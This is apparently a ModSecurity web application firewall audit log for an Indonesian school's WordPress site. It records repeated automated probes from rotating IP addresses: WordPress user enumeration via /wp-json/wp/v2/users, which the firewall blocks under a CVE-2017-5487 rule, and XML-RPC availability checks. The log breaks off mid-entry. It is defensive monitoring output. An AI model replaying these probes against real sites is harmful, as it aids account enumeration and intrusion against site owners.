Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b31ae03d-Z-- --6c4dcc7a-A-- [08/May/2025:07:36:32 +0700] aBv8kI4K347NtBcwXKwFYAAAAJY 103.236.140.4 42026 103.236.140.4 8181 --6c4dcc7a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.76.110 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.76.110 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --6c4dcc7a-C-- demo.sayHello --6c4dcc7a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --6c4dcc7a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746664592237471 6533 (- - -) Stopwatch2: 1746664592237471 6533; combined=4645, p1=644, p2=3807, p3=31, p4=35, p5=75, sr=118, sw=53, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6c4dcc7a-Z-- --15432b28-A-- [08/May/2025:07:37:33 +0700] aBv8zY4K347NtBcwXKwFZAAAAIE 103.236.140.4 42036 103.236.140.4 8181 --15432b28-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.112.40 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.112.40 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --15432b28-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --15432b28-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746664653360620 2673 (- - -) Stopwatch2: 1746664653360620 2673; combined=1142, p1=372, p2=749, p3=0, p4=0, p5=21, sr=52, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --15432b28-Z-- --0af66113-A-- [08/May/2025:07:37:39 +0700] aBv806cs1DvJ_HgMHE_xhAAAABE 103.236.140.4 42040 103.236.140.4 8181 --0af66113-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.112.40 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.112.40 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --0af66113-C-- demo.sayHello --0af66113-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --0af66113-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746664659664154 5896 (- - -) Stopwatch2: 1746664659664154 5896; combined=4056, p1=624, p2=3249, p3=32, p4=36, p5=69, sr=81, sw=46, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0af66113-Z-- --04175c7a-A-- [08/May/2025:07:40:16 +0700] aBv9cKcs1DvJ_HgMHE_xiAAAAAE 103.236.140.4 42074 103.236.140.4 8181 --04175c7a-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.174.205 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.174.205 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --04175c7a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --04175c7a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746664816579876 3309 (- - -) Stopwatch2: 1746664816579876 3309; combined=1447, p1=507, p2=907, p3=0, p4=0, p5=33, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --04175c7a-Z-- --7c886573-A-- [08/May/2025:07:40:22 +0700] aBv9dsP9GxxPAbCroFbMmwAAAEo 103.236.140.4 42078 103.236.140.4 8181 --7c886573-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.174.205 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.174.205 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --7c886573-C-- demo.sayHello --7c886573-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --7c886573-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746664822060932 5850 (- - -) Stopwatch2: 1746664822060932 5850; combined=4263, p1=599, p2=3395, p3=28, p4=86, p5=91, sr=153, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7c886573-Z-- --7184a050-A-- [08/May/2025:07:49:53 +0700] aBv_scP9GxxPAbCroFbMnwAAAEc 103.236.140.4 42098 103.236.140.4 8181 --7184a050-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.176.189 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.176.189 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --7184a050-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7184a050-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746665393590409 3294 (- - -) Stopwatch2: 1746665393590409 3294; combined=1397, p1=481, p2=885, p3=0, p4=0, p5=31, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7184a050-Z-- --3d28c122-A-- [08/May/2025:07:50:10 +0700] aBv_wo4K347NtBcwXKwFbgAAAJY 103.236.140.4 42102 103.236.140.4 8181 --3d28c122-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.176.189 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.176.189 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --3d28c122-C-- demo.sayHello --3d28c122-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --3d28c122-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746665410266094 5706 (- - -) Stopwatch2: 1746665410266094 5706; combined=3896, p1=510, p2=3066, p3=33, p4=114, p5=102, sr=60, sw=71, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3d28c122-Z-- --4f2d8467-A-- [08/May/2025:07:56:29 +0700] aBwBPacs1DvJ_HgMHE_xjQAAAAg 103.236.140.4 42124 103.236.140.4 8181 --4f2d8467-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.90.46 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.90.46 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --4f2d8467-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4f2d8467-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746665789251609 3447 (- - -) Stopwatch2: 1746665789251609 3447; combined=1463, p1=478, p2=947, p3=0, p4=0, p5=38, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4f2d8467-Z-- --2f170d55-A-- [08/May/2025:07:56:36 +0700] aBwBRKcs1DvJ_HgMHE_xjgAAABA 103.236.140.4 42128 103.236.140.4 8181 --2f170d55-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.90.46 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.90.46 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --2f170d55-C-- demo.sayHello --2f170d55-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --2f170d55-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746665796749878 4698 (- - -) Stopwatch2: 1746665796749878 4698; combined=3775, p1=457, p2=2993, p3=23, p4=26, p5=151, sr=66, sw=125, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2f170d55-Z-- --8a739a70-A-- [08/May/2025:08:01:22 +0700] aBwCYis5rYyn3jlLjjK-1gAAAMI 103.236.140.4 42192 103.236.140.4 8181 --8a739a70-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.33.111 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.33.111 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --8a739a70-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8a739a70-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746666082646622 3131 (- - -) Stopwatch2: 1746666082646622 3131; combined=1290, p1=435, p2=825, p3=0, p4=0, p5=30, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8a739a70-Z-- --ae6a2370-A-- [08/May/2025:08:01:29 +0700] aBwCaacs1DvJ_HgMHE_xkwAAAAQ 103.236.140.4 42196 103.236.140.4 8181 --ae6a2370-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.33.111 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.33.111 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --ae6a2370-C-- demo.sayHello --ae6a2370-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --ae6a2370-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746666089732879 5092 (- - -) Stopwatch2: 1746666089732879 5092; combined=3949, p1=507, p2=3234, p3=26, p4=26, p5=92, sr=67, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ae6a2370-Z-- --923ae157-A-- [08/May/2025:08:05:00 +0700] aBwDPMP9GxxPAbCroFbMogAAAEw 103.236.140.4 42216 103.236.140.4 8181 --923ae157-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.179.237 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.179.237 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --923ae157-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --923ae157-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746666300684666 3278 (- - -) Stopwatch2: 1746666300684666 3278; combined=1437, p1=497, p2=906, p3=0, p4=0, p5=33, sr=75, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --923ae157-Z-- --d79c9a41-A-- [08/May/2025:08:05:19 +0700] aBwDT6cs1DvJ_HgMHE_xmAAAAAU 103.236.140.4 42222 103.236.140.4 8181 --d79c9a41-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.179.237 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.179.237 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --d79c9a41-C-- demo.sayHello --d79c9a41-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --d79c9a41-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746666319400835 6825 (- - -) Stopwatch2: 1746666319400835 6825; combined=4883, p1=677, p2=3995, p3=32, p4=57, p5=72, sr=139, sw=50, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d79c9a41-Z-- --eff9bc7c-A-- [08/May/2025:08:33:48 +0700] aBwJ_I4K347NtBcwXKwFhwAAAIs 103.236.140.4 42316 103.236.140.4 8181 --eff9bc7c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.99.2 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.99.2 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --eff9bc7c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --eff9bc7c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746668028202581 3409 (- - -) Stopwatch2: 1746668028202581 3409; combined=1501, p1=521, p2=943, p3=0, p4=0, p5=36, sr=121, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --eff9bc7c-Z-- --71ce607a-A-- [08/May/2025:08:34:08 +0700] aBwKEMP9GxxPAbCroFbMrwAAAE0 103.236.140.4 42320 103.236.140.4 8181 --71ce607a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.99.2 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.99.2 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --71ce607a-C-- demo.sayHello --71ce607a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --71ce607a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746668048373194 6507 (- - -) Stopwatch2: 1746668048373194 6507; combined=4568, p1=608, p2=3743, p3=57, p4=35, p5=74, sr=76, sw=51, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --71ce607a-Z-- --937b8b07-A-- [08/May/2025:08:35:09 +0700] aBwKTSs5rYyn3jlLjjK-4gAAAMA 103.236.140.4 42328 103.236.140.4 8181 --937b8b07-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.63.187 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.63.187 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --937b8b07-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --937b8b07-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746668109656202 3361 (- - -) Stopwatch2: 1746668109656202 3361; combined=1491, p1=488, p2=914, p3=0, p4=0, p5=89, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --937b8b07-Z-- --8aed226d-A-- [08/May/2025:08:35:18 +0700] aBwKVo4K347NtBcwXKwFigAAAJQ 103.236.140.4 42332 103.236.140.4 8181 --8aed226d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.63.187 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.63.187 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --8aed226d-C-- demo.sayHello --8aed226d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --8aed226d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: 